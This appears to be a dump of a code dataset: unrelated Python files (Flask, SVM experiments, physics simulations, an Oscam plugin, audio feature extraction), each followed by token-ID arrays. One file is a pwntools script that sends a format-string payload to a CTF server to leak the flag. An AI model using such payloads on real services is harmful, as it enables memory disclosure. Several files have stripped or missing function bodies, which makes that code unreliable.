# 특정 고객의 모든 시술 기록을 불러옴
@manager.route('/customer/<customerID>', methods=['GET'])
@tokenVerify
| [
171,
119,
123,
6738,
1366,
9787,
1330,
6491,
6601,
9787,
198,
11748,
33918,
198,
198,
6738,
6284,
13,
2704,
2093,
30515,
13414,
1958,
1330,
11241,
13414,
1958,
198,
6738,
42903,
1330,
39932,
11,
18261,
11,
308,
198,
6738,
1281,
34239,
1... | 2.47619 | 147 |
import numpy as np
class LongTensor:
"""
LongTensor is a type of Tensor to keep integers
"""
def __init__(self, value, name='LongTensor', trainable=False):
"""
:param value: long value
:param name:
:param trainable:
"""
self.value = np.array(value, dtype=np.int32)
self.name = name
class Tensor:
"""
Tensor is the basic structure in the computation graph
It holds value for forward computation and grad for backward propagation
"""
def __init__(self, value, name='Tensor', dtype=np.float32, trainable=True, grad=None):
"""
:param value: numpy val
:param name: name for the Tensor
:param trainable: whether the Tensor can be trained or not
"""
# value for forward computation
if isinstance(value, list):
self.value = np.array(value, dtype=dtype)
else:
self.value = value
# value for backward computation
if grad is not None:
self.grad = grad
else:
self.grad = np.zeros(self.value.shape, dtype=np.float32)
# name for the Tensor (which will used in parameter for registration)
self.name = name
# whether the Tensor can be updated
self.trainable = trainable
| [
11748,
299,
32152,
355,
45941,
198,
198,
4871,
5882,
51,
22854,
25,
198,
220,
220,
220,
37227,
198,
220,
220,
220,
5882,
51,
22854,
318,
257,
2099,
286,
309,
22854,
284,
1394,
37014,
628,
220,
220,
220,
37227,
628,
220,
220,
220,
82... | 2.406534 | 551 |
# -*- coding: utf-8 -*-
"""
Created on Mon Jan 4 18:45:05 2021.
@author: mahdi
"""
import numpy as np
import matplotlib.pyplot as plt
from sklearn import svm, datasets
from sklearn.datasets import make_blobs
from sklearn.preprocessing import StandardScaler
from sklearn.neighbors import NearestCentroid
import statistics
import math
from scipy import stats
from scipy.stats import linregress
import pandas as pd
from sklearn import metrics
from sklearn.model_selection import train_test_split
from sklearn.metrics import hinge_loss
# %% Functions
def unit_vector(vector):
"""
Compute the unit vector.
Parameters
----------
vector : numpy array
The input vector.
Returns
-------
TYPE : numpy array
The unit vector of the input.
"""
return vector / np.linalg.norm(vector)
def angle_between(v1, v2):
"""
Calculate the angle between two vectors.
Parameters
----------
v1 : numpy array
vector 1.
v2 : numpu array
vector 2.
Returns
-------
TYPE :
The angle between two vectors in raidan.
"""
v1_u = unit_vector(v1)
v2_u = unit_vector(v2)
return np.arccos(np.clip(np.dot(v1_u, v2_u), -1.0, 1.0))
def projection_on_line(c_center_1, c_center_2, original_data):
"""
Calculate the projection of one data points on the line going through \
bothcluster centers.
Parameters
----------
c_center_1 : numpy 1 by 2 array
first center coordinates.
c_center_2 : numpy 1 by 2 array
scond center coordinates.
original_data : numpy n by 2 array
data points.
Returns
-------
projection : numpy array
the coordinates of the points projected on to the line going through\
the line which connects the two centers.
"""
vector_data = original_data - c_center_1
projection_line = c_center_1 - c_center_2
projection = c_center_1 + np.dot(vector_data, projection_line) /\
np.dot(projection_line, projection_line) * projection_line
return projection
def calculate_center(original_data):
"""
Calculate the center of data points for the label.
Parameters
----------
original_data : numpy array
The data points.
Returns
-------
center_co : numpy array
The coordinates of the center point.
"""
avr_vec = np.sum(original_data, axis=0)
center_co = avr_vec/original_data.shape[0]
return center_co
def calculate_pvar(pdata):
"""
Calculate the variance of the data projected on to the line.
Parameters
----------
pdata : numpy array
the coordinates of the data projected on the line
Returns
-------
data_var : numpy array
the variance of the projected data points on the line.
"""
c_center = calculate_center(pdata)
mean_vec = np.full(pdata.shape, c_center)
temp_disvec = pdata - mean_vec
temp_vec = []
for i in range(pdata.shape[0]):
sign_v = np.dot(unit_vector(temp_disvec[1, :]),
unit_vector(temp_disvec[i, :]))
temp_valu = np.sign(sign_v) * np.linalg.norm(temp_disvec[i, :])
temp_vec.append(temp_valu)
# temp_vec = np.linalg.norm(temp_disvec, axis=1)
temp_vec = np.array(temp_vec)
data_var = np.var(temp_vec)
return data_var
def calculate_dvar(pdata):
"""
Calculate the variance of the data based on the distance from central\
point.
Parameters
----------
pdata : numpy array
the coordinates of the data projected on the line
Returns
-------
data_var : numpy array
the variance of the projected data points on the line.
"""
c_center = calculate_center(pdata)
mean_vec = np.full(pdata.shape, c_center)
temp_disvec = pdata - mean_vec
temp_vec = np.linalg.norm(temp_disvec, axis=1)
temp_pvec = np.power(temp_vec, 2)
temp_sum = np.sum(temp_pvec)
data_var = temp_sum / pdata.shape[0]
return data_var
def rotate_data(X_data, y):
"""
Do the rotation to make variance calculation easier.
Parameters
----------
X_data : numpy array
The data points that we want to rotata.
y : numpy array
Labels for X_data.
Returns
-------
X_rotated : numpy array
Rotated numpy array.
"""
X_datap = X_data[y == 1]
X_datan = X_data[y == -1]
center_p = calculate_center(X_datap)
center_n = calculate_center(X_datan)
slope = (center_p[1] - center_n[1])/(center_p[0] - center_n[0])
# slope = (X_data[0, 1] - X_data[1, 1])/(X_data[0, 0] - X_data[1, 0])
angle = (math.atan(slope))
theta = -angle
c, s = np.cos(theta), np.sin(theta)
rotation_mat = np.array(((c, -s), (s, c)))
X_rotated = []
for i in range(X_data.shape[0]):
X_rot = rotation_mat.dot(X_data[i])
X_rotated.append(X_rot)
X_rotated = np.array(X_rotated)
return X_rotated
# %% Generating the data
n_samples_1 = 2000
n_samples_2 = 2000
centers = [[-2, 0.0], [2, 2.0]] # cluster centers
clusters_std = [0.7, 0.7] # cluster std_dev
X, y = make_blobs(n_samples=[n_samples_1, n_samples_2],
centers=centers,
cluster_std=clusters_std,
random_state=0, shuffle=False)
y = np.where(y == 1, 1, -1)
# %% Preprocessing step
scaler = StandardScaler()
# X_s = scaler.fit_transform(X)
X_s = X
X_pos = X_s[y == 1]
X_neg = X_s[y == -1]
center_1 = NearestCentroid()
center_1.fit(X_s, y)
data_centers = center_1.centroids_
c_y = np.array([[1], [-1]])
pos_center = calculate_center(X_pos)
neg_center = calculate_center(X_neg)
print(f'The cluster centers are: {center_1.centroids_}')
# %% calculating S&S for clusters
# Calulate the distance of the centers
distance = np.linalg.norm(data_centers[0, :] - data_centers[1, :])
# First projecting the data on to the line which go through the cetners
X_pro = []
for i in range(X_s.shape[0]):
projected_data = projection_on_line(data_centers[0, :], data_centers[1, :],
X_s[i])
X_pro.append(projected_data)
X_pro = np.array(X_pro)
X_pro_pos = X_pro[y == 1]
X_pro_neg = X_pro[y == -1]
var_x_pos = calculate_pvar(X_pro_pos)
var_x_neg = calculate_pvar(X_pro_neg)
total_var = ((X_pro_pos.shape[0] * var_x_pos) +
(X_pro_neg.shape[0] * var_x_neg)) / (X_pro_pos.shape[0] +
X_pro_neg.shape[0])
sigma = np.sqrt(total_var)
SandS = 20 * np.log10(distance / (6 * sigma))
# Projection of the data on to the X axis
X_rota = rotate_data(X_pro, y)
X_rota_pos = X_rota[y == 1]
X_rota_neg = X_rota[y == -1]
# %% Plotting the data and centeral points
fig, ax = plt.subplots()
ax.scatter(X_s[:, 0], X_s[:, 1], marker="o", s=20,
color=["coral" if y == -1 else "cyan" for y in y])
ax.scatter(data_centers[:, 0], data_centers[:, 1],
color=["lime" if y == 1 else "r" for y in c_y])
# %% plotting the projection on to the line going throught two centers
fig, ax = plt.subplots()
# xmin, xmax = -10, 10
# ax.set_xlim([xmin, xmax])
# ax.set_ylim([xmin, xmax])
# Move left y-axis and bottim x-axis to centre, passing through (0,0)
# ax.spines['left'].set_position('zero')
# ax.spines['bottom'].set_position('zero')
# Eliminate upper and right axes
# ax.spines['right'].set_color('none')
# ax.spines['top'].set_color('none')
# Show ticks in the left and lower axes only
ax.xaxis.set_ticks_position('bottom')
ax.yaxis.set_ticks_position('left')
# make the box square shape
ax.set_aspect('equal')
ax.scatter(X_pro[:, 0], X_pro[:, 1], marker="o", s=20,
color=["r" if y == -1 else "b" for y in y], alpha=0.5)
ax.scatter(X_s[:, 0], X_s[:, 1], alpha=0.5)
start, end = ax.get_xlim()
ax.xaxis.set_ticks(np.arange(start, end, 3.0))
ax.set_title('Projected and datas')
# %% Plotting the rotated data
fig, ax = plt.subplots()
# xmin, xmax = -5, 0
# ax.set_xlim([xmin, xmax])
# ax.set_ylim([xmin, xmax])
# Move left y-axis and bottim x-axis to centre, passing through (0,0)
# ax.spines['left'].set_position('zero')`
# ax.spines['bottom'].set_position('zero')
# Eliminate upper and right axes
# ax.spines['right'].set_color('none')
# ax.spines['top'].set_color('none')
# Show ticks in the left and lower axes only
# ax.xaxis.set_ticks_position('bottom')
# ax.yaxis.set_ticks_position('left')
# make the box square shape
# ax.set_aspect('equal')
ax.scatter(X_rota[:, 0], X_rota[:, 1], marker="o", s=20,
color=["r" if y == -1 else "b" for y in y])
start, end = ax.get_xlim()
ax.xaxis.set_ticks(np.arange(start, end, 3.0))
# %% Ishtiaque approch
# make a dataframe with following columns
cols = ['iteration', 'C', 'Margin', 'Train_hinge_loss', 'cost_training',
'Test_hinge_loss', 'cost_testing']
lst = []
iteration_num = 10
for i in range(1, iteration_num):
X_train, X_test, y_train, y_test = train_test_split(X_s, y, test_size=0.40,
random_state=1)
i = i
Cs = np.logspace(-1, 2, 1000).tolist()
Cs = np.array(Cs)
clf = svm.SVC(kernel='linear', C=Cs)
C = []
Margin = []
train_errors = []
test_errors = []
number_of_misclassified_train_points = []
number_of_misclassified_test_points = []
Train_hinge_loss = []
cost_training = []
Test_hinge_loss = []
cost_testing = []
for C in Cs:
clf.set_params(C=C)
clf.fit(X_train, y_train)
i = i
w = clf.coef_[0]
y_train_predict = clf.predict(X_train)
train_error = metrics.mean_squared_error(y_train, y_train_predict)
train_errors.append(train_error)
misclassified_train = np.where(y_train != y_train_predict)
number_of_misclassified_train_points.append(misclassified_train)
pred_decision_train = clf.decision_function(X_train)
hinge_loss_train = hinge_loss(y_train, pred_decision_train)
Train_hinge_loss.append(hinge_loss_train)
pred_decision_test = clf.decision_function(X_test)
hinge_loss_test = hinge_loss(y_test, pred_decision_test)
Test_hinge_loss.append(hinge_loss_test)
cost_train = 1/2 * np.dot(w, w) + C * hinge_loss_train
cost_training.append(cost_train)
cost_test = 1/2 * np.dot(w, w) + C * hinge_loss_test
cost_testing.append(cost_test)
# alpha=clf.dual_coef_
# alphas.append(alpha)
# ξ=y_train*clf.decision_function(X_train)
# ξs.append(ξ)
a = -w[0] / w[1]
M = 2 / np.sqrt(np.sum(w ** 2))
Margin.append(M)
lst.append([i, C, M, hinge_loss_train, cost_train, hinge_loss_test,
cost_test])
comp_list = []
df = pd.DataFrame(lst, columns=cols)
for i in range(iteration_num):
temp_df = df[df['iteration'] == i]
temp_ar = temp_df.to_numpy()
comp_list.append(temp_ar)
del comp_list[0]
array_sum = comp_list[0] + comp_list[1]
for i in range(len(comp_list)-2):
array_sum = array_sum + comp_list[i+2]
averaged_data = array_sum/len(comp_list)
# plotting the average
fig, ax = plt.subplots()
ax.plot(averaged_data[:, 2], averaged_data[:, 5])
ax.set(xlabel='C values', ylabel='test cost',
title='test')
ax.grid()
df.to_excel(r'dataset_one.xlsx', index=False, header=True)
# %%
# fit the model and get the separating hyperplane
clf = svm.SVC(kernel='linear', C=1.0)
clf.fit(X_s, y)
# fit the model and get the separating hyperplane using weighted classes
wclf = svm.SVC(kernel='linear', class_weight={1: 10})
wclf.fit(X_s, y)
fig, ax = plt.subplots()
# plot the samples
ax.scatter(X_s[:, 0], X_s[:, 1], c=y, cmap=plt.cm.Paired, edgecolors='k')
# plot the decision functions for both classifiers
ax = plt.gca()
xlim = ax.get_xlim()
ylim = ax.get_ylim()
# create grid to evaluate model
xx = np.linspace(xlim[0], xlim[1], 30)
yy = np.linspace(ylim[0], ylim[1], 30)
YY, XX = np.meshgrid(yy, xx)
xy = np.vstack([XX.ravel(), YY.ravel()]).T
# get the separating hyperplane
Z = clf.decision_function(xy).reshape(XX.shape)
# plot decision boundary and margins
a = ax.contour(XX, YY, Z, colors='k', levels=[0], alpha=0.5, linestyles=['-'])
# get the separating hyperplane for weighted classes
Z = wclf.decision_function(xy).reshape(XX.shape)
# plot decision boundary and margins for weighted classes
b = ax.contour(XX, YY, Z, colors='r', levels=[0], alpha=0.5, linestyles=['-'])
plt.legend([a.collections[0], b.collections[0]], ["non weighted", "weighted"],
loc="upper right")
plt.show()
| [
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
201,
198,
37811,
201,
198,
41972,
319,
2892,
2365,
220,
604,
1248,
25,
2231,
25,
2713,
33448,
13,
201,
198,
201,
198,
31,
9800,
25,
42768,
10989,
201,
198,
37811,
201,
198,... | 2.177979 | 5,967 |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Oct 29 19:02:02 2019
@author: amandaash
"""
import numpy as np
import matplotlib.pyplot as plt
"""
dt = 0.0001
mass = 1
p_value = 2
k_constant = 100
v_initial = 0
x_initial = 1
t_initial = 0
t_final = 10
static_coeff = 0.45
kinetic_coeff = 0.35
viscous_coeff = 0.6
plt.title('damped oscillator, P = {0}, k = {1}, $\\mu_s$ = {2}, $\\mu_k$ = {3}, b = {4}' .format(p_value, k_constant, static_coeff, kinetic_coeff, viscous_coeff))
x_val,v_val,t_val = harmonic_oscillator_friction_beta(p_value,k_constant,v_initial,x_initial,mass,dt,t_initial,t_final,static_coeff,kinetic_coeff,viscous_coeff)
period, angular_frequency = find_period(v_val, dt)
#print(angular_frequency, angular_frequency*2*m)
plt.plot(x_val, t_val)
plt.xlabel('x[m]')
plt.ylabel('t[s]')
#plt.plot(v_val, t_val)
plt.show()
dt = 0.0001
mass = 1
p_value = 2
k_constant = 1
v_initial = 0
x_initial = 1
t_initial = 0
t_final = 100
F_drive = 10000
frequency_drive = 10
#Large Driving Force:
plt.title('overwhelmed driven oscillator, P = {0}, k = {1}, $F_0$ = {2}, $\\omega$ = {3}'.format(p_value, k_constant, F_drive, frequency_drive))
x_drive, v_drive, t_drive = harmonic_oscillator_drive(p_value,k_constant,v_initial,x_initial,mass,dt,t_initial,t_final,F_drive,frequency_drive)
plt.plot(x_drive, t_drive, '-')
plt.xlabel('x[m]')
plt.ylabel('t[s]')
plt.show()
#beats conditions?: dt = 0.0001, m = 1, p = 2, k = 10, v0 = 0, x0 = 1, t0 = 0, tf = 10, F0 = 10, omega = 1
dt = 0.0001
mass = 1
p_value = 2
k_constant = 10
v_initial = 0
x_initial = 1
t_initial = 0
t_final = 75
F_drive = 10
x_natural, v_natural, t_natural = harmonic_oscillator_friction_beta(p_value,k_constant,v_initial,x_initial,mass,dt,t_initial,t_final,0,0,0)
natural_period, natural_frequency = find_period(v_natural, dt)
print(natural_frequency)
epsilon = 0.1
frequency_drive = natural_frequency + epsilon
x_drive, v_drive, t_drive = harmonic_oscillator_drive(p_value,k_constant,v_initial,x_initial,mass,dt,t_initial,t_final,F_drive,frequency_drive)
plt.figure(figsize = (8,14))
plt.title('beats driven oscillator, P = {0}, k = {1}, $F_0$ = {2}, $\\omega$ = {3}'.format(p_value, k_constant, F_drive, frequency_drive))
plt.plot(x_drive, t_drive, '-')
plt.plot(x_natural, t_natural, '-', alpha = 0.5)
plt.axhline(y = natural_period, color = 'k', label = 'natural frequency')
plt.axhline(y = 1/(0.1/(2*np.pi)), color = 'purple', label = 'beat frequency [1 period]')
plt.xlabel('x[m]')
plt.ylabel('t[s]')
plt.ylim(t_initial, t_final)
plt.legend()
plt.savefig('beats.pdf')
plt.show()
#resonance conditions?: dt = 0.001, m = 1, p = 2, k = 1, v0 = 0, x0 = 1, t0 = 0, tf = 40, F0 = 1, omega = 1
frequency_array = np.arange(natural_frequency/10, 10*natural_frequency, 0.1)
amplitudes = []
for frequency in frequency_array:
x_drive, v_drive, t_drive = harmonic_oscillator_drive(p_value,k_constant,v_initial,x_initial,mass,dt,t_initial,t_final,F_drive,frequency)
max_amp = np.max(x_drive)
amplitudes.append(max_amp)
plt.figure()
plt.plot(frequency_array,amplitudes, '.')
plt.xlabel('$\\omega$')
plt.ylabel('A[m]')
plt.savefig('freqv.maxamp.pdf')
plt.show()
"""
dt = 0.0001
mass = 1
p_value = 2
k_constant = 10
v_initial = 0
x_initial = 1
t_initial = 0
t_final = 20
F_drive = 10
frequency_array = np.arange(natural_frequency/10, 10*natural_frequency, 0.8)
amplitudes = []
for frequency in frequency_array:
x_drive, v_drive, t_drive = harmonic_oscillator_drive_friction(p_value,k_constant,v_initial,x_initial,mass,dt,t_initial,t_final,F_drive,frequency, b)
max_amp = np.max(x_drive)
amplitudes.append(max_amp)
plt.figure()
plt.plot(frequency_array,amplitudes, '.')
plt.xlabel('$\\omega$')
plt.ylabel('A[m]')
plt.savefig('freqv.maxamp_friction_1.pdf')
plt.show()
"""
#non-linear resonance
dt = 0.0001
mass = 1
p_value = 4
k_constant = 10
v_initial = 0
x_initial = 1
t_initial = 0
t_final = 60
F_drive = 1
x_natural, v_natural, t_natural = harmonic_oscillator_friction_beta(p_value,k_constant,v_initial,x_initial,mass,dt,t_initial,t_final,0,0,0)
natural_period, natural_frequency = find_period(v_natural, dt)
x_drive, v_drive, t_drive = harmonic_oscillator_drive(p_value,k_constant,v_initial,x_initial,mass,dt,t_initial,t_final,F_drive,natural_frequency)
plt.figure(figsize = (8,14))
plt.title('beats driven oscillator, P = {0}, k = {1}, $F_0$ = {2}, $\\omega$ = {3}'.format(p_value, k_constant, F_drive, natural_frequency))
plt.plot(x_drive, t_drive, '-')
plt.plot(x_natural, t_natural, '-', alpha = 0.5)
#plt.axhline(y = natural_period, color = 'k', label = 'natural frequency')
#plt.axhline(y = 1/(0.1/(2*np.pi)), color = 'purple', label = 'beat frequency [1 period]')
plt.xlabel('x[m]')
plt.ylabel('t[s]')
plt.ylim(t_initial, t_final)
#plt.legend()
plt.savefig('beats_nonharmonic.pdf')
plt.show()
#effect of friction on amp v. drive frequency:
dt = 0.0001
mass = 1
p_value = 2
k_constant = 10
v_initial = 0
x_initial = 1
t_initial = 0
t_final = 75
F_drive = 10
b = 0.1
frequency_array = np.arange(natural_frequency/10, 10*natural_frequency, 0.1)
amplitudes = []
for frequency in frequency_array:
x_drive, v_drive, t_drive = harmonic_oscillator_drive_friction(p_value,k_constant,v_initial,x_initial,mass,dt,t_initial,t_final,F_drive,frequency, b)
max_amp = np.max(x_drive)
amplitudes.append(max_amp)
plt.figure()
plt.plot(frequency_array,amplitudes, '.')
plt.xlabel('$\\omega$')
plt.ylabel('A[m]')
plt.savefig('freqv.maxamp_friction.pdf')
plt.show()
"""
| [
2,
48443,
14629,
14,
8800,
14,
24330,
21015,
18,
198,
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
37811,
198,
41972,
319,
30030,
2556,
2808,
678,
25,
2999,
25,
2999,
13130,
198,
198,
31,
9800,
25,
716,
5282,
107... | 2.309244 | 2,380 |
#!/usr/bin/env python
from pwn import *
SERVER = "mustard.stt.rnl.tecnico.ulisboa.pt"
PORT = 10091
POS = 7
s = remote(SERVER, PORT)
s.sendline("%{}$s".format(POS))
print(s.recvuntil("}"))
s.close()
| [
2,
48443,
14629,
14,
8800,
14,
24330,
21015,
198,
6738,
279,
675,
1330,
1635,
198,
198,
35009,
5959,
796,
366,
27238,
446,
13,
301,
83,
13,
81,
21283,
13,
660,
31522,
3713,
13,
377,
271,
48614,
13,
457,
1,
198,
15490,
796,
1802,
6... | 2.138298 | 94 |
# -*- coding: utf-8 -*-
import base64
import ConfigParser
import fileinput
import json
import os
import re
import requests
from enigma import eTimer, getDesktop, iServiceInformation
from Components.ActionMap import ActionMap
from Components.Label import Label
from Components.Sources.List import List
from Screens.MessageBox import MessageBox
from Screens.Screen import Screen
from __init__ import _
class OscamConfig:
"""Auslesen der Config-Files einer laufenden Oscam-Installation
Momentan nur die oscam.conf auslesen, um emmlogdir und Webif-Zugangsdaten
zu ermitteln.
Außerdem eine Methode zum Auslesen der gespeicherten unique EMMs
"""
EMM_OK = 1
EMM_NOT_FOUND = 2
EMM_VAR_LOG = 3
EMM_NOCHANGE = 4
#
# Die Datei mit den gespeicherten Unique EMM einlesen, alle gespeicherten
# EMMs mit letztem aufgetretenem Datum zurückliefern. Zur Darstellung
# am TV die Serial und Data unkenntlich machen.
#
#
# Blank out emmlogdir directive in oscam.conf.
#
class OscamWebif:
"""Methods to fetch information via Oscam web interface:
- do we serve a supported card (V13, V14, Teleclub)?
- what's the label of that card
- get expire dates of entitlements
- write an EMM
"""
#
# GET request for web interface url.
#
# @param url string - url
# @return string - contents of url
#
#
# Read status page from Oscam JSON API
# @return string - json text with status information
#
#
# @param date string - input date string
# @return string - formatted date string
#
#
# Use Oscam JSON API to find out, if we have a local V13/V14 or
# Teleclub card running. We return reader and CAID of that card.
#
# @return None|dict
#
#
# Write EMM via web interface form.
#
# @param reader string - label of affected reader
# @param caid string - caid of affected reader
# @param emm strig - emm to write to card
# @param callback function - where to return to after writing
#
#
# Read payload from one line of live log data.
#
# @return string|None - payload if pattern matches.
#
#
# Read last payload from 10 seconds live log.
# Call callback function after read out.
#
#
# Read payload from live log.
# Switch to debug level 4, set a timer, finish read out in timer callback.
#
# @param callback function - where to return after finishing timer callback.
#
#
# Read tier ID's
#
# @param reader string - label of reader
#
class CardStatus:
"""Class that holds gathered information from running Oscam instance.
Is independent of enigma2 session, so testably without running enigma2.
Is inherited from class OscamStatus.
"""
#
# Look in oscam.version from temp file for ConfigDir parameter
# and supported features.
#
# @param tempdir string - directory where oscam.version lives.
# set self.oscamConfdir string - path to Oscam configuration directory
# set self.oscamWebifSupport bool - is webif support compiled into Oscam
# set self.oscamLivelogSupport - is live log support compiled into Oscam
#
#
# Find Oscam temp dir from running Oscam process.
# Check if process was startet with param -t or --temp-dir
#
# @return string - temp dir where oscam.version lives.
#
#
# Find out where oscam.conf lives.
# First try to to read out /tmp/.oscam/oscam.version
# If that does not exist, try to find it from running Oscam
#
#
# Get an OscamWebif object for communication via Web interface.
#
#
# Read tier IDs and expire date from Oscam web interface.
#
# set self.expires - expire date from webif
# set self.tiers - tiers list from webif
# set self.localhostAccess - can localhost access webif
# set self.webif - @class OscamWebif
# set self.status - reader and caid for Sky from webif
#
#
# Read unique EMM's from Oscam config dir
#
| [
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
11748,
2779,
2414,
198,
11748,
17056,
46677,
198,
11748,
2393,
15414,
198,
11748,
33918,
198,
11748,
28686,
198,
11748,
302,
198,
11748,
7007,
198,
198,
6738,
551,
13495,
... | 2.741573 | 1,513 |
# -*- encoding: utf-8 -*-
"""
License: MIT
Copyright (c) 2019 - present AppSeed.us
"""
from flask import Flask, url_for
from flask_login import LoginManager
from flask_sqlalchemy import SQLAlchemy
from importlib import import_module
from logging import basicConfig, DEBUG, getLogger, StreamHandler
from os import path
db = SQLAlchemy()
login_manager = LoginManager()
def apply_themes(app):
"""
Add support for themes.
If DEFAULT_THEME is set then all calls to
url_for('static', filename='')
will modfify the url to include the theme name
The theme parameter can be set directly in url_for as well:
ex. url_for('static', filename='', theme='')
If the file cannot be found in the /static/<theme>/ location then
the url will not be modified and the file is expected to be
in the default /static/ location
"""
@app.context_processor
| [
2,
532,
9,
12,
21004,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
37811,
198,
34156,
25,
17168,
198,
15269,
357,
66,
8,
13130,
532,
1944,
2034,
50,
2308,
13,
385,
198,
37811,
198,
198,
6738,
42903,
1330,
46947,
11,
19016,
62,
1640,
1... | 3.089965 | 289 |
# -*- coding: utf-8 -*-
"""
Tencent is pleased to support the open source community by making 蓝鲸智云PaaS平台社区版 (BlueKing PaaS Community
Edition) available.
Copyright (C) 2017-2021 THL A29 Limited, a Tencent company. All rights reserved.
Licensed under the MIT License (the "License"); you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://opensource.org/licenses/MIT
Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on
an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the
specific language governing permissions and limitations under the License.
"""
import json
import logging
from rest_framework import viewsets
from rest_framework.renderers import BrowsableAPIRenderer
from rest_framework.response import Response
from backend.components import paas_cc
from backend.iam.permissions.decorators import response_perms
from backend.iam.permissions.resources.namespace_scoped import NamespaceScopedPermCtx, NamespaceScopedPermission
from backend.iam.permissions.resources.templateset import (
TemplatesetAction,
TemplatesetCreatorAction,
TemplatesetPermission,
TemplatesetRequest,
)
from backend.utils.error_codes import error_codes
from backend.utils.renderers import BKAPIRenderer
from backend.utils.response import PermsResponse
from ..mixins import TemplatePermission
from ..models import get_template_by_project_and_id
from ..showversion.serializers import GetLatestShowVersionSLZ, GetShowVersionSLZ
from . import init_tpls, serializers
from .deployer import DeployController
from .release import ReleaseData, ReleaseDataProcessor
logger = logging.getLogger(__name__)
| [
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
37811,
198,
24893,
1087,
318,
10607,
284,
1104,
262,
1280,
2723,
2055,
416,
1642,
5525,
241,
251,
165,
110,
116,
162,
247,
118,
12859,
239,
47,
7252,
50,
33176,
111,
2... | 3.576305 | 498 |
# coding=utf-8
import matplotlib.pyplot as plt
import numpy as np
if __name__ == '__main__':
# 由master生成的测试参数
row = 10000
col = 10000
iteration = 10
param = {'id': '3', 'strategy': 'lt', 'p': 10, 'c': 0.03, 'delta': 0.5, 'alpha': 2.0}
params = [{'key': 'client-a'},
{'key': 'client-b'},
{'key': 'client-c'},
{'key': 'client-d'},
{'key': 'client-e'},
{'key': 'client-f'},
{'key': 'client-g'},
{'key': 'client-h'},
{'key': 'client-i'},
{'key': 'client-j'}]
keys = np.load('statistics/Test_' + param['strategy'] + '_' + param['id'] + '_Key' + '.npy', allow_pickle=True)
times = np.load('statistics/Test_' + param['strategy'] + '_' + param['id'] + '_Time' + '.npy')
comps = np.load('statistics/Test_' + param['strategy'] + '_' + param['id'] + '_Comp' + '.npy')
stops = np.load('statistics/Test_' + param['strategy'] + '_' + param['id'] + '_Stop' + '.npy')
ideals = np.load('statistics/Test_' + param['strategy'] + '_' + param['id'] + '_Ideal' + '.npy')
color = ['b', 'g', 'r', 'c', 'm', 'y', 'k']
marker = ['o', '^', 's', 'D', 'x', '*', '+']
slave = [e['key'] for e in params]
for key, time, comp, stop, ideal in zip(keys, times, comps, stops, ideals): # 单个循环
group = {}
for i, s in enumerate(slave):
group[s] = {}
group[s]['time'] = time[i]
group[s]['comp'] = comp[i]
if key.__contains__(s):
group[s]['valid'] = True
else:
group[s]['valid'] = False
print('--- iteration ---')
print(group)
# # 计算节点总次数
# fig = plt.figure(num=1, figsize=(6, 4), dpi=150)
# plt.title('Computation vs Latency')
# plt.xlabel('latency (s)')
# plt.ylabel('computation/$m$ (ratio)')
#
# plt.plot(latency[0:2], computation[0:2], color=color[0], label=params[0]['strategy'].upper(), marker=marker[0])
# plt.plot(latency[2:6], computation[2:6], color=color[1], label=params[2]['strategy'].upper(), marker=marker[1])
# plt.plot(latency[6:12], computation[6:12], color=color[2], label=params[6]['strategy'].upper(), marker=marker[2])
#
# for i, (x, y) in enumerate(zip(latency[0:2], computation[0:2])):
# plt.annotate(r'$r$=%s' % params[i]['repNum'], xy=(x, y), xytext=(0, 5), textcoords='offset points')
#
# plt.legend(loc='upper left')
# plt.savefig('figures/Param_ComputationVsLatency.svg', dpi=150, bbox_inches='tight')
# plt.show()
| [
2,
19617,
28,
40477,
12,
23,
198,
11748,
2603,
29487,
8019,
13,
9078,
29487,
355,
458,
83,
198,
11748,
299,
32152,
355,
45941,
198,
198,
361,
11593,
3672,
834,
6624,
705,
834,
12417,
834,
10354,
198,
220,
220,
220,
1303,
13328,
242,
... | 1.977778 | 1,305 |
import shutil
import tempfile
from pathlib import Path
import librosa
import numpy as np
import parselmouth as pm
import scipy.io.wavfile as wav
import scipy.signal as sig
import soundfile
from misc.shared import DATA_DIR, DATASET_DIR
from pydub import AudioSegment
from python_speech_features import mfcc
from scipy.signal._savitzky_golay import savgol_filter
from tqdm import tqdm
from feature_extraction.shared import count_video_frames
def derivative(x, f):
""" Calculate numerical derivative (by FDM) of a 1d array
Args:
x: input space x
f: Function of x
Returns:
der: numerical derivative of f wrt x
"""
x = 1000 * x # from seconds to milliseconds
# Normalization:
dx = x[1] - x[0]
cf = np.convolve(f, [1, -1]) / dx
# Remove unstable values
der = cf[:-1].copy()
der[0] = 0
return der
def extract_prosodic_features(audio_filename, nb_frames, time_step=0.02):
"""
Extract all 4 prosodic features
Args:
audio_filename: file name for the audio to be used
Returns:
pros_feature: energy, energy_der, pitch, pitch_der, pitch_ind
"""
# Read audio from file
sound = AudioSegment.from_file(audio_filename, format="wav")
# Alternative prosodic features
pitch, energy = compute_prosody(audio_filename, time_step)
duration = len(sound) / 1000
t = np.arange(0, duration, time_step)
energy_der = derivative(t, energy)
pitch_der = derivative(t, pitch)
# Stack them all together
pros_feature = np.stack((energy, energy_der, pitch, pitch_der))
# And reshape
pros_feature = np.transpose(pros_feature)
return sig.resample(pros_feature, nb_frames)
def crosstalk_vad(
speaker1_path,
speaker2_path,
frame_count,
tha=30,
thb=5,
savgol_win=301,
savgol_poly_order=1,
):
"""
tha: absolute dB level for when to consider there to be speech activity in a channel
thb: minimum difference between channels to consider it to be one speaker only
"""
fs, x1 = wav.read(speaker1_path)
_, x2 = wav.read(speaker2_path)
x1 = x1.astype("float")
x2 = x2.astype("float")
# calculate rms energy in dB at a rate of 100 Hz (hop length 0.01 s)
e1 = librosa.core.amplitude_to_db(
librosa.feature.rms(x1, frame_length=int(fs * 0.02), hop_length=int(fs * 0.01))
).flatten()
e2 = librosa.core.amplitude_to_db(
librosa.feature.rms(x2, frame_length=int(fs * 0.02), hop_length=int(fs * 0.01))
).flatten()
